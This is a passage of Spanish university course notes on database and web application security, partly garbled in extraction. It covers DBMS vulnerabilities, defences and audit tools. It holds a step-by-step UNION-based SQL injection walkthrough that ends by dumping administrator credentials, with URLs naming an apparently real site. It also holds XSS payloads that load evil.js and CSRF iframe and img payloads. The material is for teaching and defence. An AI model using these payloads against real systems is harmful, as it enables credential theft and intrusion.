Documentos de Académico
Documentos de Profesional
Documentos de Cultura
2 TEMA
Esquema
TEMA 1 – Esquema
Seguridad en bases de datos
Ideas clave
Para estudiar este tema lee las Ideas clave que encontrarás a continuación, además de
los siguientes documentos:
Guía SP800-44v2 del NIST (páginas 9-1 a 9-5), disponible en la siguiente dirección:
http://csrc.nist.gov/publications/nistpubs/800-44-ver2/SP800-44v2.pdf
Guía SP800-44v2 del NIST (páginas 9-5 a 9-10 y 9-14, disponible en la siguiente
dirección:
http://csrc.nist.gov/publications/nistpubs/800-44-ver2/SP800-44v2.pdf
De acuerdo con Alex Rothacker director de AppSec's team shatter (security heuristics
of application testing technology for enterprise research), las vulnerabilidades más
frecuentes y peligrosas en sistemas gestores de bases de datos son:
DB1 : default and DB2 : SQL injection DB3 : excessive user & DB4 : unnecessary
weak passwords in the DBMS group privileges enabled DBMS features
En la misma línea están otras fuentes como la de Imperva que publica las 5
vulnerabilidades más peligrosas en SGBD,s:
Las vulnerabilidades que pueden tener lugar en las aplicaciones web como inyección
SQL-XML-XQUERY, XSS, CSRF, LFI, RFI, WEB SHELLS principalmente y otras
pueden ser indirectamente la puerta de entrada a los almacenes de datos.
Los ataques mediante web shell son un método sigiloso utilizado para obtener acceso
remoto no autorizado a un servidor. Las web shells son puertas traseras que utilizan la
funcionalidad principal del servidor web (que sirve a clientes remotos) Para obtener
acceso remoto persistente y obtener control total o limitado sobre el servidor a través
de un interfaz con la shell del servidor. Las web shells pueden comprometer las bases
de datos de la organización y exfiltrar los datos sin detección. El atacante utiliza las
capacidades de exploración de archivos del shell para localizar y robar las credenciales
de base de datos utilizadas por la aplicación legítima desde el archivo de configuración
de la aplicación. Esto es posible gracias al hecho de que la shell posee inherentemente
los privilegios del servidor de aplicaciones/daemon en sí en el sistema operativo.
Tanto los SGBD,s como las aplicaciones suelen tener cuentas por defecto que hay que
deshabilitar. Las contraseñas han de ser fuertes, de longitud adecuada, incluyendo
caracteres especiales, expirar periódicamente y carecer de sentido. Se deben
monitorizar frecuentemente los accesos al SGBD.
Inyección SQL
Mediante la inyección SQL un atacante podría realizar entre otras cosas las siguientes
acciones contra el sistema:
Figura 4. Ejemplo de bug que deja abierto el código a un ataque de inyección de SQL
Pero un atacante puede asignar al campo itemname la cadena «name' OR 'a'='a» con lo
que la sentencia se convierte en:
SELECT * FROM items WHERE owner = 'wiley' AND itemname = 'name' OR 'a'='a';
http://sitio.com/noticias.php?id=-1+UNION+SELECT+1,2
http://sitio.com/noticias.php?id=-1+UNION+SELECT+1,2,3
http://sitio.com/noticias.php?id=-1+UNION+SELECT+1,2,3,4
Y así sucesivamente hasta que el error desaparezca. En este caso se llega hasta el
número 6, pero hay ocasiones en las que puede superar los 70. Cuando el error ya no
esté se volverá a mostrar la página y curiosamente contiene uno o más números en el
banner de la web. Esos números son relativos a tablas y se puede afirmar que la web es
vulnerable a SQLi. Seguidamente se debe elegir uno de los números, se puede
seleccionar el 5 (puede usar cualquiera) para que me muestre los nombres de las tablas
en su lugar.
Lo que sigue ahora es agregar después del último número de la url el siguiente código:
+from+information_schema.tables— (Mysql) y reemplazar el número 5 (que fue el
número que apareció en el cuerpo de la página) por table_name.
http://sitio.com/noticias.php?id=-
1+UNION+SELECT+1,2,3,4,tablename,6+from+information_schema.tables
http://www.sitio.com/noticias.php?id=-
1+UNION+SELECT+1,2,3,4,%2520tablename,6+from+information_schema.tables+li
mit+2,1--
http://www.sitio.com/noticias.php?id=-
1+UNION+SELECT+1,2,3,4,%2520tablename,6+from+information_schema.tables+li
mit+3,1%25E2%2580%2594
Se convierte el nombre de tabla a ascii: 115 105 116 105 111 95 97 100 109 105 110 105
115 116 114 97 100 111 114 101 115 y se ejecuta:
http://www.semgaragon.es/web/noticias/noticia.php?id=-
1+UNION+SELECT+1,2,3,4,group_concat(column_name),6+from+information_sche
ma.columns+where+table_name=char(115,105,116,105,111,95,97,100,109,105,110,105,1
15,116,114,97,100,111,114,101,115)%E2%80%94
Las que sirven son las columnas de login y password, así que ahora se reemplazan en la
inyección lo siguiente:
Concat significa concatenar, algo similar que unir. Y el 0x3a son dos puntos. Esto es
para que el usuario y la contraseña no aparezcan juntas, sino que los separe los dos
puntos. Teniendo un resultado algo así:
Usuario: contraseña
http://www.samg.es/web/noticias/noticia.php?id=-1+UNION+SELECT+1,2,3,4,
concat(Login,0x3a,Password),6+from+sitio_administradores—
¿Se obtiene la misma página? Sí: parece que inyección ejecutada (true).
Si la página nunca cambia es posible que todavía pueda ser vulnerable. Para averiguarlo
se pueden utilizar diversas herramientas que automatizan los ataques como son los
vulnerability automatic scanners como Ironwasp o Zap y también herramientas más
específicas como:
Los fabricantes, proyectos como OWASP, WASC, etc. ofrecen mejores prácticas para el
desarrollo seguro, dando recomendaciones claras y precisas para evitar la inyección de
código. ESAPI es una colección gratis y abierta de código de implementación de
funciones de seguridad que un desarrollador necesita para construir una aplicación web
segura.
Hay que minimizar al máximo la superficie de ataque. Los usuarios pueden obtener
acceso indebido a objetos debido a deficiencias en la gestión de la autorización, por
ejemplo, en la asignación de roles.
Hay que minimizar la superficie de ataque inhabilitando opciones en el SBBD que sean
innecesarias. De esta forma se dificultarán las posibles acciones por parte de atacantes.
x p_cmdshell
Oracle configuration management (OCM) –
stores configuration data about hostnames,
usernames, datafile, locations, etc.
Hay que conocer lo más posible todas las posibilidades de configuración en cuanto a la
gestión del espacio de almacenamiento, usuarios, módulos, puertos, etc. y
concretamente las relativas a la seguridad. Nos tenemos que preguntar:
TRUST_ALLCLNTS configuration
parameter: if set to default (which is
Y ES) all clients attempting to connect
will be considered trusted.
Estas vulnerabilidades pueden ocasionar que un usuario con bajo perfil pueda ser
usuario administrador DBA. Es necesario revisar la matriz de autorizaciones a los
usuarios y solucionar cualquier desviación en los permisos asignados a todos los
usuarios y comprobar que están acordes a lo deseado finalmente.
Los ataques de denegación de servicio pueden ser muy perjudiciales para un SGBD. Por
ejemplo, el gusano SQL SLAMMER atacó y comprometió 75.000 víctimas en 10
minutos. El mantenimiento de parches del sistema es fundamental. Las consultas a las
bases de datos toman más tiempo que otros accesos a la aplicación y suelen formar
parte de estos ataques simples o distribuidos o mediante BOTNET,s. Las defensas
pasan por configuración segura de servidores, protecciones como firewalls de
aplicaciones web (WAF), protecciones de defensa perimetral mediante SIEM, IDS-IPS
y protecciones vía hardware específico anti DDOS tanto en la instalación del proveedor
ISP como en la propia organización que permita discriminar el tráfico normal del
ilegítimo.
En este apartado y en los siguientes se van a analizar varias de las vulnerabilidades más
importantes que pueden tener lugar las aplicaciones web y que pueden ser explotadas
para obtener accesos indebidos (ejecución de código remoto, robo de sesiones) a
sistemas para obtener información no autorizada de las bases de datos con el objetivo
de conseguir un beneficio económico para el atacante. Entre las vulnerabilidades más
peligrosas y frecuentes que se pueden consultar en OWASP TOP TEN [45] WASC [39] o
SANS TOP 25 [46] se encuentran:
» Secuestro de sesiones.
» Acceder a la historia de exploración
Un ataque cross site scripting (XSS) reflected, ocurre cuando se dan estos dos
pasos:
» Los datos entran a la aplicación a través de entradas no validadas como una petición
HTTP, es decir, existe una vulnerabilidad XSS.
» La aplicación incluye los datos en un contenedor dinámico que se envía al navegador
web del usuario sin la apropiada validación de contenido malicioso.
Si el nombre del parámetro tiene un valor como Pepe, el JSP producirá el siguiente
mensaje:
Hello Pepe!
%3Cscript%20src%3D%22http%3A//example.com/evil.js%22%3E%3C/script%3
Attacker
Victim Application with XSS
browser v ulnerability
4. Browser executes
3. Application includes
attacker´s code, sends
attacker´s code in
confidential data back
HT TP response.
t o a ttacker.
En una porción de código de una aplicación web que tiene una base de datos como el de
la figura 10. El valor de name podría parecer menos peligroso, pero si ese dato se
suministró a la base de datos de forma externa esta base de datos puede conducir a
ataques.
A pplication 1
Attacker
Database
A pplication 2
Esta variante de XSS se denomina stored cross site scripting. En la figura se puede
ver cómo un atacante envía datos maliciosos a una base de datos a través de una
primera aplicación, una segunda aplicación puede leer esos datos y reenviarlos al
navegador de la víctima.
Ejemplos de XSS:
El valor del parámetro de consulta «q» se inserta en la página devuelta por Google.
Supongamos, además, que los datos no se validan, no se filtran o no se escapan
Evil.org podría poner una página que hace que la siguiente URL se cargarse en el
navegador (por ejemplo, en un <iframe> invisible):
http://www.google.com/search?q=flowers+%3Cscript%3Eevil_script()%3C/script%3E
Cuando una víctima se carga esta página www.evil.org, el navegador carga el iframe
de la URL anterior. El documento se carga en el iframe contendrá ahora el
fragmento:
Cargando la página hará que el navegador para ejecutar evil_script (). Por otra
parte, este script se ejecutará en el contexto de una página cargada desde
www.google.com
if (act.compareTo("ALUMNOS")==0){ %>
CARRERA: <%= carrera %> :-<%= ncarrera %>
<FORM ACTION="/Webeev/ADMIN/AdminFr3.jsp?cmd=POST&cu=<%= curso %>&ca=<%=
carrera %>" /*sink*/
METHOD="POST">
o La víctima accede a la app-web vulnerable y obtiene una cookie (o ID) para esa
sesión.
o La víctima accede a la app-web a través de una URL maliciosa (XSS reflejado) o
directamente (XSS persistente).
o El navegador de la víctima envía el script que es reflejado por la app-web o se
obtiene el script inyectado previamente por el atacante.
o El script se ejecuta en el navegador de la víctima y envía la cookie al atacante, en
silencio.
o El atacante suplanta al usuario víctima.
» Validación de la entrada.
» Codificación de la salida para evitar caracteres como >,<, &, etc. en URL,s.
» Parámetro HTTPONLY para evitar uso de cookies en scripts.
» Parámetro SECURE para obligar a utilizar protocolo TLS.
Los objetivos incluyen aplicaciones web como las redes sociales, clientes de correo
electrónico, navegador de banca en línea e interfaces web para los dispositivos de red.
Las peticiones maliciosas son enviadas desde un sitio que un usuario visita (del
atacante) a otro sitio que el atacante cree que la víctima se ha autenticado. Las
peticiones maliciosas se enrutan al sitio de destino a través del navegador de la víctima
que se autentica en el sitio de destino.
<iframe
src="http://examplebank.com/app/transferFunds?amount=1500&destinationAccount
=123456789">
<img src=”http://192.168.1.1/admin/config/outsideInterface?nexthop=123.45.67.89”
alt=”pwned” height=”1” width=”1”/>
Los atacantes sabían que cuando estaba leyendo el tutorial que estaría conectado a la
interfaz del router. Así que tuvieron la configuración ataque CSRF en el tutorial. Con
esta petición el router sería reconfigurado para que el tráfico se encamine a su
servidor proxy en el que pueden hacer todo tipo de cosas no buenas con ella (ver
figura 13).
Defensas contra CSRF. Se deben utilizar peticiones POST frente a GET, solicitar
verificación manual al usuario para acciones críticas en la app-web como tarjetas
coordenadas, SMS, CAPTCHA, etc., inclusión de tokens anti-CSRF en las peticiones
para validarlos antes de procesarlas en el lado servidor. El token debe ser: dinámico,
por sesión y usuario, aleatorio, suficientemente largo y solo usado con SSL/TLS,
utilizando un token por cada formulario crítico y acción. No se deberá usar nunca
cookies para el token anti-CSRF que debe expirar. Analizar peticiones procedentes de
otros sitios web en los logs. CSRF invita a crear controles detallados de flujo y de lógica
de negocio en la aplicación web, por ejemplo:
Librerías Anti-CSRF:
Los campos de dichas sentencias deben validarse previamente para evitar la ejecución
remota. Los efectos de estas ejecuciones pueden ser muy variados, pueden suponer el
escaneo de la red donde se haya el usuario, instalar código para posteriores acciones
etc.
» Identificar y trazar las actividades de seguridad del SSDLC con los elementos y
requisitos comunes de seguridad en SGBD,s.
Normalmente, se supone que se está inmerso en una organización que tiene definida
una política de seguridad con lo que esto implica y que se tienen procesos definidos
en todo lo que se refiere a desarrollo de software, gestión de configuración, gestión y
aseguramiento de la calidad con sus correspondientes procedimientos y actividades,
donde un proyecto de software tiene una dirección de proyecto, equipo de desarrollo y
de esta manera se planifica y gestiona adecuadamente y se sigue un modelo de ciclo de
vida adaptado a las características del proyecto.
» Análisis y diseño:
» Implementación – desarrollo:
» Producción:
» La autenticación de usuarios.
» La autorización de acceso a recursos.
» La integridad.
» Confidencialidad de los datos.
» Auditoria.
» Backup y recuperación.
» Clustering – replicación – bases de datos distribuidas.
Autorización
Rev ocar
pr ivilegios Bloqu eo de
in necesarios A uthenticated user functionality u suarios
Sear c h for products Sear c h f or salespeople
A dd new pr oducts
Change product prices
Cr eación de
Ex piración de
los r oles
cu entas
n ecesarios
Integridad. Hay que asegurar que los datos no son alterados indebidamente por
usuarios no autorizados y garantizar el no repudio de las acciones que puedan haber
sido realizadas por cualquier usuario. Las capacidades a desarrollar que proporciona un
SGBD en este sentido son:
Para alcanzar los elementos comunes de seguridad a cualquier SGBD del tipo que
sea hay que llevar a cabo una serie de actividades de seguridad en el marco del SSCLC
elegido para desarrollar los requisitos comunes de seguridad que una vez
implementados garantizan cada elemento de seguridad con un nivel que debería ser el
mayor posible de acuerdo con el grado de clasificación del sistema.
» Seguridad de la red.
» Seguridad en el S.O. de la plataforma.
» Seguridad Front-end SGBD.
» Servidor de aplicaciones / web.
» Seguridad de las aplicaciones.
» Otros servicios: SNMP, SMTP.
N db Cl uster Relay
N db Cl uster
Engi ne Binlog Engi ne Binlog
Binlog
Finalmente, hay que tomar lecciones aprendidas del incidente de seguridad, tipo
de ataque, características, vulnerabilidades explotadas, actuación de todo tipo de
personal implicado, usuarios, administradores de sistemas, equipo de seguridad,
etc. El objetivo último de la gestión de incidentes es la formación en este campo
aprendiendo en la práctica de los propios incidentes de seguridad.
Aplicación
Recibir mensaje
Petición Respuesta
TCP/IP TCP/IP
Petición
Respuesta
Vulnerabilidades LDAP
Inyección Ldap. Suponer que una aplicación web que utiliza un filtro de búsqueda
como el siguiente:
» Searchfilter = «(cn =" + usuario + ")». Que es instanciado por una solicitud HTTP
como esta:
Http://www.example.com/ldapsearch?user=John
Http://www.example.com/ldapsearch?user=*
El filtro se verá así: searchfilter = "(cn = *)" que coincide con cualquier objeto con
un atributo 'cn' igual a cualquier cosa.
Inyección XPAH. Es similar a las inyecciones SQL. Los ataques de Inyección XPath
se producen cuando un sitio web usa datos suministrado por un usuario para construir
una consulta XPath para datos XML. Mediante el envío de información
intencionalmente mal formada al sitio web, un atacante puede averiguar cómo se
estructuran los datos XML o acceder a datos a los que no se suelen tener acceso. El
atacante puede incluso ser capaz de elevar sus privilegios en el sitio web si los datos
XML se utilizan para la autenticación (por ejemplo, un archivo de usuario basado en
XML).
Las consultas XML se realizan con XPath, un tipo de declaración descriptiva simple que
permite la consulta XML para localizar una información. Como SQL, puedes especificar
ciertos atributos a encontrar y los patrones a seguir. Cuando se usa XML en un sitio
web es común aceptar algún formulario de entrada de cadena de texto para identificar
el contenido de localizar y mostrar en la página. Esta entrada debe ser supervisada para
comprobar que no provoca errores en la consulta XPath ni devuelve datos incorrectos.
» Análisis y diseño:
» Implementación – desarrollo:
» Producción:
» La autenticación de usuarios.
» La autorización de acceso a recursos.
» La integridad.
» Confidencialidad de los datos.
» Puertos y protocolos de red.
» Base de datos del directorio.
» Replicación.
» Herramientas de sincronización de directorios.
» Auditoría.
» Backup y recuperación.
» Proporcionar un punto central para que los clientes tengan acceso a los datos del
directorio.
» Asegurar que el acceso a los datos del directorio esté de acuerdo con la política de
seguridad deseada.
» Habilitar el acceso seguro a clientes a través de redes que pueden no tener
características de confidencialidad o integridad.
» Garantizar que los problemas de integridad de los datos se aborden cuando se
actualizan los datos.
» Permitir la distribución de los datos del directorio cuando sea necesario para
problemas de desempeño.
» Permitir una copia de seguridad coherente de los datos de directorio de tal manera
que los datos puedan ser restaurados cuando sea necesario.
Hay que tener en cuenta para reducir los impactos operacionales en las cuentas de
proceso de servicio de directorios:
Asegurar que los intentos fallidos de inicio de sesión sin éxito en un corto período
de tiempo resulten en un bloqueo de la cuenta.
Para permitir que los datos de directorio relacionados sean accesibles cuando se
distribuye a través de múltiples servidores se ideó el concepto de referencia de
conocimiento. Las referencias de conocimiento son formas de permitir que la
información de los directorios sea recuperada cuando esa información no está dentro
del directorio que fue buscado. Hay dos tipos generales de referencia de conocimiento:
» La identidad del sistema operativo en el que se ejecuta una instancia del servidor de
directorios debe tenerse en cuenta. Aunque algunas configuraciones requieren el uso
de credenciales altamente privilegiadas, como la de superusuario UNIX, no todas las
configuraciones lo requieren. En aquellos casos en que se utilizan credenciales
privilegiadas es más importante que otras funciones como pasarelas no se ejecuten
en la misma instancia del servidor.
» Debido a que los datos contenidos en el directorio se utilizan a veces como base de
las decisiones de control de acceso, un fallo del servidor podría resultar en una
pérdida de disponibilidad de las plataformas del directorio. Para mitigar esta
vulnerabilidad puede ser necesario desplegar varios servidores de directorios
y poder garantizar la disponibilidad continua de los datos del directorio.
» Si los datos del directorio incluyen datos de autenticación como contraseñas que
pueden reutilizarse, el servidor debe proteger la confidencialidad de esos datos en la
base de datos. Se debe implementar el cifrado formalmente validado.
Se conoce como la Root directory system agent (DSA) Specific entry (DSE). Los Raíz
DSE tienen varias piezas importantes de información expresada como atributos. La
información incluye la versión de LDAP (v2 o v3), información sobre mecanismos de
seguridad soportados e información sobre los nombres de contextos (ramas de árbol de
directorios o subárboles principales) que contiene el directorio. Consideraciones para
controlar el acceso a la DSE raíz:
Además del DSE raíz, el control de acceso sobre todos los objetos y atributos del
directorio es necesario para preservar la confidencialidad, integridad y disponibilidad
de los datos. Aunque los mecanismos de control varían, el de control de acceso
heredado que fluye a través del árbol de directorios es necesario. Las implementaciones
pueden referirse a las sentencias de control acceso como listas de control de acceso
(ACL) o instrucciones de control de acceso (ACI). El acceso a objetos de base de datos
de directorio anónimo o no autenticado (que se considera equivalente en este
documento) es una cuestión importante de seguridad.
Esto es lógico porque los directorios normalmente contienen datos que son designados
como sensibles o clasificados, o datos que permitan el acceso a otros sistemas que
procesan información sensible o clasificada datos. Sin embargo, puede haber casos en
que las herramientas del cliente se han diseñado para utilizar algunos accesos
anónimos como se indica en la discusión anterior relativa al DSE raíz.
» Las bases de datos suelen estar compuestas por varios archivos que residen en el
sistema operativo. Como con cualquier archivo de datos del sistema, un control de
acceso a archivos adecuado es necesario. Apropiados permisos de escritura
impiden actualizaciones inadvertidas o malintencionadas que podrían comprometer
la integridad de la base de datos. Los permisos de lectura restrictivos impiden la
captura de los datos para que no puedan ser objeto de ataques fuera de línea.
» Debe configurarse la base de datos para capturar los datos de auditoría y poder ser
auditados por el auditor de seguridad. Sin una manera de determinar la fuente y el
alcance de un acceso será imposible determinar la naturaleza o el alcance del daño si
el servidor se compromete.
También hacer los datos accesibles a un mayor número de clientes de directorio y poder
ofrecer un mejor soporte a los clientes en área geográfica. Puede ser parte de una
estrategia para recuperarse de interrupciones de red o de servidores individuales.
El tráfico a través del puerto 389 puede estar encriptado o no. Depende del
vendedor. Implementaciones actuales de AD, configuradas de forma segura,
cifran el tráfico administrativo en el puerto 389. Cuando el cifrado no está
habilitado los datos de autenticación de texto sin formato o cualquier otro dato
confidencial podrían ser interceptados en tránsito.
Las versiones de LDIFDE también incluyen una opción («-h») que invoca LDIFDE
cifrado basado en SASL. Los principales problemas de seguridad de CSVDE y
LDIFDE son la protección de los archivos de datos. En tránsito o en un sistema de
archivos, los datos podrían contener información sensible. A menos que se
especifique explícitamente un mecanismo de cifrado, los datos serían vulnerables a
la divulgación si se interceptaban en tránsito.
# Criterio Descripción
Los sistemas DAM capturan y almacenan la actividad de los perfiles
1 Control de
comportamientos de la base de datos y pueden notificar cuando los patrones de
comportamiento han cambiado. La detección de estos patrones
puede indicar un empleado descontento o una cuenta secuestrada.
DAM recoge las transacciones y genera informes que demuestran el
2 Vigilancia del
cumplimiento cumplimiento o falta de este. Ya sea reglamentaria o contractual, el
cumplimiento es el mayor impulsor para la adopción de un DAM.
Una forma DAM evita ataques mediante el control de la actividad de
3 Ciber protección
contra ataques las aplicaciones, la generación de una base del comportamiento
normal y mediante la identificación de un ataque basado en una
divergencia de las estructuras y secuencias SQL normales.
Tabla 1. Criterios imprescindibles de un DAM según Ryan O´Hare
Las suites DAP han incorporado los criterios establecidos en la tecnología DAM. Estas
suites han evolucionado de herramientas DAM que ofrecían análisis de la actividad del
usuario en las SGBD y alrededor de ellas, para abarcar un conjunto más integral de
capacidades DAM - desde 2012 por Gartner, DAP por definición, abarca ahora DAM y
DAP juntos. DAP se refiere a las suites de herramientas que se utilizan para apoyar la
identificación y reportar comportamiento inapropiado, ilegal o de otra forma
indeseable en los DBMS con mínimo impacto en las operaciones y la productividad del
usuario incorporando las siguientes capacidades:
# Criterio Descripción
# Criterio Descripción
# Criterio Descripción
8 Evaluación de Los DAP pueden extraer e informar sobre los permisos de usuario
usuarios y que mantienen las bases de datos sobres sus propias reservas de
permisos. identidad y normas.
Tabla 2. Capacidades de DAP según Jeffrey Wheatman
Cabe resaltar del anterior estudio que la firma Garther Inc. propone el concepto de
«auditoria y protección centralizada de datos» – DCAP (del término en inglés data-
centric audit and protection) y consigna la siguiente relación de tecnologías [13]:
Big Data
Cloud
Ci pherCloud
Cl oudLoc k
Imper va
(sk y f ence)
N etsk ope Varonis
IBM
Per specsys
Sk y high N etworks Or ac le
Tr ustware
Im perva
Database Files
Figura 22. Representación esquemática del mercado DCAP mostrando a través de silos de datos
Risky
Bets Contenders Strong Leaders
Performers
Strong
IBM
Im perva
Sentrigo
Application security
Current Oracle
offering
Fortinet
Market presence
Weak
# Tecnología Descripción
3 Auditoría del Las empresas con limitaciones financieras pueden hacer uso de
DBMS auditoría y registro de SGBD internos utilizando herramientas o
secuencias de comandos de producción local. Sin embargo, este
enfoque está limitado por los altos gastos de auditoría interna y
recursos de cómputo.
Figura 24. Criterios de selección para una herramienta de monitorización de seguridad de los datos
Alonso, J. M., Guzmán, A., Laguna, P. y Martín. A. Ataques a BB. DD., SQL injection.
Barcelona UOC. Recuperado el 6 de febrero de 2017 en:
https://www.exabyteinformatica.com/uoc/Informatica/Seguridad_en_bases_de_dato
s/Seguridad_en_bases_de_datos_(Modulo_3).pdf
Chess, B. and West, J. (2007). Secure programming with static analysis Addison
Wesley software security series. Madrid: McGraw.
Krikken, R. (2012). DAM Grows up, welcome DAP! Recuperado el 2 de junio de 2016
en: http://blogs.gartner.com/ramon-krikken/2012/03/02/dam-grows-up-welcome-
dap/
Lowans, B. y Perkins, E. (2014). Market guide for data centric Audit and protection.
Recuperado el 07 de junio de 2016 en:
https://www.dbmasters.at/i/Projects/dbmasters/bilder/vortraege/20150316_market_
guide_for_datacentric.pdf
McGraw, G. (2006) Software security building security in. Boston: Addison Wesley.
Yuhanna, N. (2011). The forrester wave: database auditing and real time protection,
Q2 2011. Recuperado el 7 de junio de 2016 en:
http://www.powermag.com/Assets/the_forrester_wave.pdf
Material complementario
No dejes de leer…
No dejes de ver…
A fondo
Seguridad en SGBD,s
Seguridad en SGBD,s
Guía
Enlaces relacionados
SANS Institute
Database security
Imperva
Actividades
Objetivos
Instalación
Analiza la seguridad del SBD MYSQL de la aplicación WAVSEP con una herramienta de
análisis de seguridad.
Criterios de evaluación
Entrega
Test
2. Sobre las amenazas a que están expuestos los SGBD,s señala la opción incorrecta:
A. Es importante deshabilitar opciones innecesarias.
B. Los ataques de denegación de servicio pueden ser muy perjudiciales.
C. Los ataques SQL injection son frecuentes.
D. Todas las anteriores son falsas.